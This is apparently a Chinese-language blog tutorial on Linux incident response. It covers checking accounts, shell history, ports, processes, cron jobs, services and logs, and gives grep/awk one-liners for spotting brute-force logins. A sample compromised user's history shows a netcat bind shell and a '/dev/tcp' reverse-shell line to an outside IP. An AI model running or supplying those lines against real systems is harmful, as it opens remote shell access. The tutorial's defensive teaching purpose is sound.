应急响应基础(二)——Linux入侵排查

Linux入侵排查思路

(1)账号安全

1、用户信息文件:/etc/passwd

root:x:0:0:root:/root:/bin/bash
用户名:密码:用户ID:组ID:用户说明:家目录:登陆之后shell
注意:无密码只允许本机登陆,远程不允许登陆

2、影子文件:/etc/shadow

root:$6$dIEKcGV4PJpr6kGu$jSpNY9SGXkkE3XakM4neFh24UT6G3mB0OCWV3ciTgmtntVEKFZ3Zc5BU69cLXqSBllz/JxA2YRC77xCG9A5YP/:17966:0:99999:7:::
用户名:加密密码:密码最后一次修改日期:两次密码的修改时间间隔:密码有效期:密码修改到期到的警告天数:密码过期之后的宽限天数:账号失效时间:保留

3、who:查看当前登录用户(tty本地登录,pts远程登录)

       w:查看系统信息,某一时刻用户的行为;

       uptime:查看登录多久,多少用户,负载;

[root@redhat 桌面]# who
root     tty1         2019-04-15 01:38 (:0)
root     pts/0        2019-05-20 13:05 (:0.0)
root     pts/3        2019-05-20 14:16 (:0.0)
root     pts/10       2019-07-30 14:18 (:0.0)
[root@redhat 桌面]# w
 14:22:54 up  6:43,  4 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty1     :0               15Apr19 106days  1:06   1:06  /usr/bin/Xorg :
root     pts/0    :0.0             20May19 71days  0.14s  0.08s bash
root     pts/3    :0.0             20May19 71days  0.39s  0.39s /bin/bash
root     pts/10   :0.0             14:18    0.00s  0.42s  0.20s w
[root@redhat 桌面]# uptime
 14:22:59 up  6:43,  4 users,  load average: 0.00, 0.01, 0.00

4、入侵排查

1、查询特权用户特权用户(uid 为0)
[root@redhat 桌面]# awk -F: '$3==0{print $1}' /etc/passwd
root
yaoyao

2、查询可以远程登录的帐号信息
[root@redhat 桌面]# awk '/\$1|\$6/{print $1}' /etc/shadow
root:$6$dIEKcGV4PJpr6kGu$jSpNY9SGXkkE3XakM4neFh24UT6G3mB0OCWV3ciTgmtntVEKFZ3Zc5BU69cLXqSBllz/JxA2YRC77xCG9A5YP/:17966:0:99999:7:::
yaoyao2:$6$EUXxnIJY$28gZzQb8LU2FXHAy26qiJsIItl0N3Vuh0smJiGvBB8fDcWj2sAYugGNpvHziwfqXIo8UojVhr4SPEKD7ZWO.s0:17973:0:99999:7:::
tangyan:$6$e.JWZKLS$v8uDzLjYgET0cF8Y2zfdcz6f85k1aP8NY0sYPoYDRx5gaxJ1ELQGjeXKFmgIF9nK9ovRJHi/rSqUnplubMKFp/:17986:0:99999:7:::
xiaoqi:$6$f8XiLhMA$4dTZ4vGJjwKK.Zxc/UI2Ch3UnWB0Y9zdYpN2ZUtbtMdFkRVivoBm09KMX9XMHGqV7v/G39cvRddu0Fuqf3hZf1:17986:0:99999:7:::

3、除root帐号外,其他帐号是否存在sudo权限。如非管理需要,普通帐号应删除sudo权限
[root@redhat 桌面]# more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
tom ALL=(ALL) NOPASSWD:ALL

4、禁用或删除多余及可疑的帐号
    usermod -L user    禁用帐号,帐号无法登录,/etc/shadow第二栏为!开头
    userdel user       删除user用户
    userdel -r user    将删除user用户,并且将/home目录下的user目录一并删除

(2)历史命令

1、通过.bash_history查看帐号执行过的系统命令;

[root@redhat ~]# more .bash_history
sh neicun.sh
sh get-mac.sh
sh act-ip.sh
vim #!/bin/bash
vim getarp.sh
arping -c 2 -w 1 192.168.37.2
arping -c 2 -w 1 192.168.37.2 -I eth1
ifconfig

2、root的历史命令:history

 [root@redhat ~]# history
......
  529  awk -F: '$3==0{print $1}' /etc/passwd
  530  awk '/\$1|\$6/{print $1}' /etc/shadow
  531  more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
  532  ls
  533  cd /root
  534  ls
  535  ls -la
  536  vim .bash_history
  537  more .bash_history
  538  history

3、打开/home各帐号目录下的.bash_history,查看普通帐号的历史命令;

[root@redhat ~]# more /home/tom/.bash_history 
who am i
whoami
bin/dash
/bin/dash
exit
whoami
pwd
whoami
nc -nvlp 8080 -t -e /bin/bash
bash -i >& /dev/tcp/192.168.37.131/8080 0>&1

4、历史操作命令的清除:history -c

但此命令并不会清除保存在文件中的记录,因此需要手动删除.bash_profile文件中的记录。

5、入侵排查

进入用户目录下:cat .bash_history >> history.txt

(3)检查异常端口

1、使用netstat 网络连接命令,分析可疑端口、IP、PID

[root@redhat ~]# netstat -pantu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1971/rpcbind        
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      2236/sshd           

2、查看PID对应进程文件路径

[root@redhat ~]# ls -l /proc/2236/exe
lrwxrwxrwx. 1 root root 0 7月  30 14:50 /proc/2236/exe -> /usr/sbin/sshd

(4)检查异常进程

使用ps命令,分析进程

[root@redhat ~]# ps aux
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.0  0.2  19360  1280 ?        Ss   07:39   0:05 /sbin/init
root          2  0.0  0.0      0     0 ?        S    07:39   0:00 [kthreadd]
root          3  0.0  0.0      0     0 ?        S    07:39   0:00 [migration/0]

(5)检查开机启动项

查看系统启动项也是一个有效发现黑客攻击的方法,查看的方法也很简单,就是查看几个系统文件就行了,一般来说我们只需要查看下述的这几个文件就行

系统启动项:
more /etc/rc.local
ls -l /etc/rc.d/rc[0~6].d
ls -l /etc/rc.d/rc3.d/
more /etc/ld.so.preload       linux动态链接库,linux正常程序运行过程中,动态链接器会读取LD_PRELOAD环境变量的值和默认配置文件/etc/ld.so.preload的文件内容,并将读取到的动态链接库进行预加载,即使程序不依赖这些动态链接库。

(6) 检查定时任务

1、利用crontab创建计划任务

基本命令:

  • crontab -l :列出某个用户cron服务的详细内容
  • crontab -r :删除每个用户cront任务(谨慎:删除所有的计划任务)
  • crontab -e :使用编辑器编辑当前的crontab文件
  • ls -al /var/spool/cron/  :查看计划任务文件

  • more /etc/crontab  :查看计划任务

如:*/1 * * * * echo "hello world" >> /tmp/test.txt 每分钟写入文件

2、入侵排查

重点关注以下目录中是否存在恶意脚本

/var/spool/cron/* 
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/* 
/etc/cron.hourly/* 
/etc/cron.monthly/*
/etc/cron.weekly/
/etc/anacrontab
/var/spool/anacron/*

#小技巧
可以使用   more /etc/cron.daily/*   查看目录下的所有文件

root@root:/etc/cron.daily# more /etc/cron.daily/*
::::::::::::::
/etc/cron.daily/0anacron
::::::::::::::
#!/bin/sh
#
# anacron's cron script
#
# This script updates anacron time stamps. It is called through run-parts
# either by anacron itself or by cron.
#
# The script is called "0anacron" to assure that it will be executed
# _before_ all other scripts.

test -x /usr/sbin/anacron || exit 0
anacron -u cron.daily

(7) 检查服务

服务自启动

第一种修改方法:

chkconfig [--level 运行级别] [独立服务名] [on|off]
chkconfig –level  2345 httpd on  开启自启动
chkconfig httpd on (默认level是2345)

第二种修改方法:

修改/etc/re.d/rc.local 文件  
加入 /etc/init.d/httpd start

第三种修改方法:

使用ntsysv命令管理自启动,可以管理独立服务和xinetd服务。

入侵排查

1、查询已安装的服务:

RPM包安装的服务

chkconfig  --list  查看服务自启动状态,可以看到所有的RPM包安装的服务
ps aux | grep crond 查看当前服务

系统在3与5级别下的启动项 
中文环境
chkconfig --list | grep "3:启用\|5:启用"
英文环境
chkconfig --list | grep "3:on\|5:on"

源码包安装的服务

查看服务安装位置 ,一般是在/user/local/
service httpd start
搜索/etc/rc.d/init.d/  查看是否存在

(8) 检查异常文件

1、查看敏感目录,如/tmp目录下的文件,同时注意隐藏文件夹,以“..”为名的文件夹具有隐藏属性

2、得到发现WEBSHELL、远控木马的创建时间,如何找出同一时间范围内创建的文件?

​ 可以使用find命令来查找,如 find /opt -iname "*" -atime 1 -type f 找出 /opt 下一天前访问过的文件

3、针对可疑文件可以使用stat进行创建修改时间。

(9) 检查系统日志

日志默认存放位置:/var/log/

查看日志配置情况:more /etc/rsyslog.conf

日志文件说明
/var/log/cron记录了系统定时任务相关的日志
/var/log/cups记录打印信息的日志
/var/log/dmesg记录了系统在开机时内核自检的信息,也可以使用dmesg命令直接查看内核自检信息
/var/log/mailog记录邮件信息
/var/log/message记录系统重要信息的日志。这个日志文件中会记录Linux系统的绝大多数重要信息,如果系统出现问题时,首先要检查的就应该是这个日志文件
/var/log/btmp记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用lastb命令查看
/var/log/lastlog记录系统中所有用户最后一次登录时间的日志,这个文件是二进制文件,不能直接vi,而要使用lastlog命令查看
/var/log/wtmp永久记录所有用户的登录、注销信息,同时记录系统的启动、重启、关机事件。同样这个文件也是一个二进制文件,不能直接vi,而需要使用last命令来查看
/var/log/utmp记录当前已经登录的用户信息,这个文件会随着用户的登录和注销不断变化,只记录当前登录用户的信息。同样这个文件不能直接vi,而要使用w,who,users等命令来查询
/var/log/secure记录验证和授权方面的信息,只要涉及账号和密码的程序都会记录,比如SSH登录,su切换用户,sudo授权,甚至添加用户和修改用户密码都会记录在这个日志文件中

日志分析技巧:


1、定位有多少IP在爆破主机的root帐号:    
grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

定位有哪些IP在爆破:
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c

爆破用户名字典是什么?
 grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr
 
2、登录成功的IP有哪些: 	
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

登录成功的日期、用户名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}' 

3、增加一个用户kali日志:
Jul 10 00:12:15 localhost useradd[2382]: new group: name=kali, GID=1001
Jul 10 00:12:15 localhost useradd[2382]: new user: name=kali, UID=1001, GID=1001, home=/home/kali
, shell=/bin/bash
Jul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali
#grep "useradd" /var/log/secure 

4、删除用户kali日志:
Jul 10 00:14:17 localhost userdel[2393]: delete user 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed group 'kali' owned by 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed shadow group 'kali' owned by 'kali'
# grep "userdel" /var/log/secure

5、su切换用户:
Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)

sudo授权执行:
sudo -l
Jul 10 00:43:09 localhost sudo:    good : TTY=pts/4 ; PWD=/home/good ; USER=root ; COMMAND=/sbin/shutdown -r now

原文参考链接:https://blog.csdn.net/qq_23936389/article/details/83511323

参与评论 您还未登录,请先 登录 后发表或查看评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:书香水墨 设计师:CSDN官方博客 返回首页

打赏作者

橘子女侠

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值